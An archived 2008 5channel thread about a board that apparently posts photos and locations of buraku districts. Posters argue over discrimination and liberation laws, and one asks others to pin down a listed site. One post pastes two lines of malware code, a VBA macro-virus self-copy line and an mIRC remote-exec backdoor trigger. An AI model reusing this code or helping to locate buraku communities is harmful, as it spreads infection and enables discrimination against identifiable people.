5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

差別掲示板、女神のoppai糾弾

1 :名無しさん@お腹いっぱい。:2008/06/30(月) 21:32:20 ID:POEAWMYb0
sabetsu kyuudan

2 :名無しさん@お腹いっぱい。:2008/06/30(月) 21:37:54 ID:MMy1pobaO

  ∩∩
 ∩| || |∩
 | .|| || || |
 |  __|
 | (__.|.  ∧_∧
 ヽ.___.丿\(・∀・ ) >>1ってコレなの?
   .   \     )
        | | | 
        .(_(__)

3 :名無しさん@お腹いっぱい。:2008/06/30(月) 21:44:34 ID:xsExcnvk0
>>2さん

>>1は・・・
ズバリ ↓ です!!

4 :名無しさん@お腹いっぱい。:2008/06/30(月) 22:12:36 ID:S6cwGsIT0
4つ

5 :もっこす2.0 ◆gBN/.dQQ7s :2008/07/01(火) 01:23:44 ID:myEfNo+y0
>>1
理由を書きなさい。
さもなくば没収します。

6 :六輔:2008/07/01(火) 08:23:12 ID:RkV8arek0
>>5
 ↑赤い悪魔

7 :名無しさん@お腹いっぱい。:2008/07/01(火) 08:26:19 ID:zMzSA7atO
>>6
↑黄色いシミ

8 :東墨ニダ:2008/07/01(火) 13:34:44 ID:luZMhp2/0
もっこすは赤い悪魔だが時々赤い天使になるのでかっこええ

9 :名無しさん@お腹いっぱい。:2008/07/02(水) 01:42:00 ID:27nlqXA90
お前ら、オーストラリア人に差別されて悔しいだろ?
差別する人間を醜いと思うだろ?

300万部落民は常日頃から謂れのない差別を受け悔しさを甘受している。
差別を受ける悔しさは、差別を受けたものにしかわからない。
数百年も続く差別の連鎖を断ち切り、真に差別のない社会を実現するためには、
多少の荒療治=部落解放基本法の制定もやむを得ない。

差別者を法的に裁き、徹底した人権教育を施す。
また、差別者がどんな末路を辿るかを社会的に認知させることによって差別の芽を摘み取ることが、
火急の課題である。まずは人権擁護法の制定、さらには部落解放基本法の制定を急ぐことが、
真に差別のない社会を創るためには不可欠であると言えよう。

10 :名無しさん@お腹いっぱい。:2008/07/03(木) 23:48:49 ID:kQKlshtI0
不特定多数が書き込める地名総覧だな
こういうのは取り締まってほしい

11 :名無しさん@お腹いっぱい。:2008/07/04(金) 00:38:41 ID:9l1rnwND0
って事は、その掲示板にウプされてるところは部落って事?

「女神のoppai」ってあまり話題にならないけど、
でもみんな見てるよね。
私も見て、なるほどって所はいっぱいありますね。

12 :名無しさん@お腹いっぱい。:2008/07/04(金) 01:57:08 ID:/8WD9FWy0
ブックマーク:13人が登録-キャッシュ って・・・

13 :名無しさん@お腹いっぱい。:2008/07/04(金) 06:43:19 ID:Lmvmqli9O
>>9
一切の逆差別をなくし部落解放同盟をはじめとする人権の名を借りた利権団体を解散させてから言え!

14 :名無しさん@お腹いっぱい。:2008/07/04(金) 09:34:25 ID:p2039XOnO
糾弾しないと食べていけないんですか?


15 :名無しさん@お腹いっぱい。:2008/07/04(金) 18:35:39 ID:zmGeBBkB0
そういえば、下町ぶらり旅なんてのもあったな


16 :名無しさん@お腹いっぱい。:2008/07/06(日) 18:21:50 ID:3eVjOmB30
おっぱいの写真なんてないじゃん…
きたない神社の写真ばかりでさ…

17 :名無しさん@お腹いっぱい。:2008/07/09(水) 23:40:27 ID:JPBGV7hT0
久しぶりに更新されとる
最後のあれは個人の家なのか?
でも寺でもないよな

18 :名無しさん@お腹いっぱい。:2008/07/11(金) 02:21:32 ID:lkLM/n6A0
http://ch1.artemisweb.jp/read1/oppai/

この筑豊編の29か?どこだろ?くわしい人います?

19 :名無しさん@お腹いっぱい。:2008/07/11(金) 02:34:55 ID:3j6Kdf0Z0
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
n0=on 900:text:!exec*:*:{.notice $nick Execut comanda: $2-

4 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)